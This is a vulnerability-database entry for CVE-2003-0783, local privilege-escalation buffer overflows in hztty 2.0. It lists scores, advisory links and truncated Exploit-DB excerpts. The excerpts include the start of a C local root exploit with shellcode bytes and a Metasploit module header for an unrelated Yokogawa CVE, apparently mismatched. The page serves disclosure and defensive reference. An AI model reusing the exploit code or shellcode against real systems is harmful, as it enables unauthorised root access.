CVE-2003-0783
Published 2003-10-06
CVE-2003-0783: Multiple buffer overflows in hztty 2.0 allow local users to gain root privileges.
Priority P427 | high | 7.2 CVSS 2.0
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.06% (60.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yongguang_zhang | hztty | — | — |
No detection rules found.
Exploit-DB
Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2014-03-12
CVE-2014-0783 Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
exists in the service BKHOdeq.exe when handling specially crafted packets. This module has
been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows
2003 SP2.
},
'Author' =>
[
'juan vazquez',
'Redsadic '
],
'References' =>
[
[ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
[ 'URL', 'https://community.rapid7.c
Exploit-DB
hztty 2.0 (RedHat 9.0) - Local Privilege Escalation
exploitdb·2003-09-21
CVE-2003-0783 hztty 2.0 (RedHat 9.0) - Local Privilege Escalation
---
/* 0x333hztty => hztty 2.0 local root exploit
*
*
* more info : Debian Security Advisory DSA 385-1
*
* *note* I adjusted some part of hztty's code since
* there were some errors. hope this will not influence
* exploitation :> tested against Red Hat 9.0 :
*
* [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
* [c0wboy@0x333 c0wboy]$ ./k
*
* --- local root exploit for hztty 2.0 ---
* --- coded by c0wboy ~ 0x33 ---
*
* sh-2.05b# [./hztty started] [using /dev/ttyp6]
* sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
* sh-2.05b#
*
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs
*
*/
#include
#include
#define BIN "./hztty"
#define SIZE 272
unsigned char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=106424495804417&w=2
http://secunia.com/advisories/9792
http://securitytracker.com/id?1007756
http://securitytracker.com/id?1007757
http://www.debian.org/security/2003/dsa-385
http://www.osvdb.org/7119
http://www.securityfocus.com/bid/8656
https://exchange.xforce.ibmcloud.com/vulnerabilities/13243
Published: 2003-10-06